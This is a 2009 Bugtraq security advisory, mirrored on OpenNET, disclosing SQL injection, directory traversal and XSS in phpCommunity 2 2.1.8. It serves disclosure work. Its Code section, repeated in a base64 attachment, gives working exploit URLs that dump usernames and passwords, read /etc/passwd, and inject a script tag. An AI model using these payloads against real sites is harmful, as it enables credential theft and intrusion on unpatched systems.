The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection /


<< Previous INDEX Search src / Print Next >> 
Date: Sat, 7 Mar 2009 18:25:19 +0100
Subject: phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / 
        Directory Traversal / XSS)
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com.>
To: Bugtraq <bugtraq@securityfocus.com.>, str0ke <str0ke@milw0rm.com.>
Content-Type: multipart/mixed; boundary=00504502b07986bf0404648aaf8e
X-Virus-Scanned: antivirus-gw at tyumen.ru


--00504502b07986bf0404648aaf8e
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: phpCommunity 2
[+] Version: 2.1.8
[+] Website: http://sourceforge.net/projects/phpcommunity2/

[+] Bugs: [A] Multiple SQL Injection
          [B] Directory Traversal
          [C] Reflected XSS

[+] Exploitation: Remote
[+] Date: 07 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities
discovered in this application.


- [A] Multiple SQL Injection


[-] Requisites: magic_quotes_gpc = off
[-] File affected: module/forum/class_forum.php
                   module/forum/class_search.php

This bug allows a guest to view username and
password of a registered user.


- [B] Directory Traversal


[-] Requisites: none
[-] File affected: module/admin/files/show_file.php,
                   module/admin/files/show_source.php

This bug allows a guest to read arbitrary files and
directory on the web server.


- [C] Reflected XSS


[-] Requisites: none
[-] File affected: templates/1/login.php


*************************************************

[+] Code


- [A] Multiple SQL Injection


http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1'
UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM
com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1'
UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM
com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25"
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25"
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25"
UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23


- [B] Directory Traversal


http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd

http://www.site.com/path/module/admin/files/show_source.php?path=/etc


- [C] Reflected XSS


http://www.site.com/path/templates/1/login.php?msg=<script>alert('XSS');</script>


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

--00504502b07986bf0404648aaf8e
Content-Type: text/plain; charset=US-ASCII; 
        name="phpCommunity 2 2.1.8 Multiple Vulnerabilities-07032009.txt"
Content-Disposition: attachment; 
        filename="phpCommunity 2 2.1.8 Multiple Vulnerabilities-07032009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_fs0kfuhp0

KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBwaHBDb21tdW5pdHkgMgpbK10gVmVyc2lvbjogMi4xLjgKWytdIFdlYnNpdGU6
IGh0dHA6Ly9zb3VyY2Vmb3JnZS5uZXQvcHJvamVjdHMvcGhwY29tbXVuaXR5Mi8KClsrXSBCdWdz
OiBbQV0gTXVsdGlwbGUgU1FMIEluamVjdGlvbgogICAgICAgICAgW0JdIERpcmVjdG9yeSBUcmF2
ZXJzYWwKICAgICAgICAgIFtDXSBSZWZsZWN0ZWQgWFNTCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1v
dGUKWytdIERhdGU6IDA3IE1hciAyMDA5CgpbK10gRGlzY292ZXJlZCBieTogU2FsdmF0b3JlICJk
cm9zb3BoaWxhIiBGcmVzdGEKWytdIEF1dGhvcjogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVz
dGEKWytdIENvbnRhY3Q6IGUtbWFpbDogZHJvc29waGlsYXh4eEBnbWFpbC5jb20KCgoqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gTWVudQoKMSkg
QnVncwoyKSBDb2RlCjMpIEZpeAoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioKClsrXSBCdWdzCgoKVGhpcyB3ZWIgYXBwbGljYXRpb24gcHJlc2VudHMg
c2V2ZXJhbCB2dWxuZXJhYmlsaXRpZXMKd2hpY2ggY2FuIGJlIGV4cGxvaXRlZCB0byBvYnRhaW4g
cmVzZXJ2ZWQgaW5mb3JtYXRpb24uClRoZSBmb2xsb3dpbmcgYXJlIGV4YW1wbGVzIG9mIHZ1bG5l
cmFiaWxpdGllcyAKZGlzY292ZXJlZCBpbiB0aGlzIGFwcGxpY2F0aW9uLgoKCi0gW0FdIE11bHRp
cGxlIFNRTCBJbmplY3Rpb24KClstXSBSZXF1aXNpdGVzOiBtYWdpY19xdW90ZXNfZ3BjID0gb2Zm
ClstXSBGaWxlIGFmZmVjdGVkOiBtb2R1bGUvZm9ydW0vY2xhc3NfZm9ydW0ucGhwCiAgICAgICAg
ICAgICAgICAgICBtb2R1bGUvZm9ydW0vY2xhc3Nfc2VhcmNoLnBocAoKVGhpcyBidWcgYWxsb3dz
IGEgZ3Vlc3QgdG8gdmlldyB1c2VybmFtZSBhbmQKcGFzc3dvcmQgb2YgYSByZWdpc3RlcmVkIHVz
ZXIuCgoKLSBbQl0gRGlyZWN0b3J5IFRyYXZlcnNhbAoKWy1dIFJlcXVpc2l0ZXM6IG5vbmUKWy1d
IEZpbGUgYWZmZWN0ZWQ6IG1vZHVsZS9hZG1pbi9maWxlcy9zaG93X2ZpbGUucGhwLAogICAgICAg
ICAgICAgICAgICAgbW9kdWxlL2FkbWluL2ZpbGVzL3Nob3dfc291cmNlLnBocAoKVGhpcyBidWcg
YWxsb3dzIGEgZ3Vlc3QgdG8gcmVhZCBhcmJpdHJhcnkgZmlsZXMgYW5kIApkaXJlY3Rvcnkgb24g
dGhlIHdlYiBzZXJ2ZXIuCgoKLSBbQ10gUmVmbGVjdGVkIFhTUwoKWy1dIFJlcXVpc2l0ZXM6IG5v
bmUKWy1dIEZpbGUgYWZmZWN0ZWQ6IHRlbXBsYXRlcy8xL2xvZ2luLnBocAoKCioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKClsrXSBDb2RlCgoKLSBbQV0g
TXVsdGlwbGUgU1FMIEluamVjdGlvbgoKaHR0cDovL3d3dy5zaXRlLmNvbS9wYXRoL2luZGV4LnBo
cD9uPWd1ZXN0JmM9MCZtPWZvcnVtJnM9MSZmb3J1bV9pZD0tMScgVU5JT04gQUxMIFNFTEVDVCAx
LDIsQ09OQ0FUKG5pY2ssIDB4M2EsIHB3ZCksNCw1LDYsNyw4IEZST00gY29tX3VzZXJzJTIzCgpo
dHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvaW5kZXgucGhwP249Z3Vlc3QmYz0wJm09Zm9ydW0mcz0y
JmZvcnVtX2lkPTAmdG9waWNfaWQ9LTEnIFVOSU9OIEFMTCBTRUxFQ1QgR1JPVVBfQ09OQ0FUKENP
TkNBVChuaWNrLCAweDNhLCBwd2QpKSBGUk9NIGNvbV91c2VycyUyMwoKaHR0cDovL3d3dy5zaXRl
LmNvbS9wYXRoL2luZGV4LnBocD9uPWd1ZXN0JmM9MCZtPXNlYXJjaCZzPWlkJndlcnQ9LTElMjUi
IFVOSU9OIEFMTCBTRUxFQ1QgQ09OQ0FUKG5pY2ssIDB4M2EsIHB3ZCksMiBGUk9NIGNvbV91c2Vy
cyUyMwoKaHR0cDovL3d3dy5zaXRlLmNvbS9wYXRoL2luZGV4LnBocD9uPWd1ZXN0JmM9MCZtPXNl
YXJjaCZzPW5pY2smd2VydD0tMSUyNSIgVU5JT04gQUxMIFNFTEVDVCBDT05DQVQobmljaywgMHgz
YSwgcHdkKSwyIEZST00gY29tX3VzZXJzJTIzCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvaW5k
ZXgucGhwP249Z3Vlc3QmYz0wJm09c2VhcmNoJnM9Zm9ydW0md2VydD0tMSUyNSIgVU5JT04gQUxM
IFNFTEVDVCAxLDIsMyw0LENPTkNBVChuaWNrLCAweDNhLCBwd2QpLDYgRlJPTSBjb21fdXNlcnMl
MjMKCgotIFtCXSBEaXJlY3RvcnkgVHJhdmVyc2FsCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgv
bW9kdWxlL2FkbWluL2ZpbGVzL3Nob3dfZmlsZS5waHA/ZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8u
Li8uLi9ldGMvcGFzc3dkCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvbW9kdWxlL2FkbWluL2Zp
bGVzL3Nob3dfc291cmNlLnBocD9wYXRoPS9ldGMKCgotIFtDXSBSZWZsZWN0ZWQgWFNTCgpodHRw
Oi8vd3d3LnNpdGUuY29tL3BhdGgvdGVtcGxhdGVzLzEvbG9naW4ucGhwP21zZz08c2NyaXB0PmFs
ZXJ0KCdYU1MnKTs8L3NjcmlwdD4KCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqCgpbK10gRml4CgpObyBmaXguCgoKKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKg==
--00504502b07986bf0404648aaf8e--

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру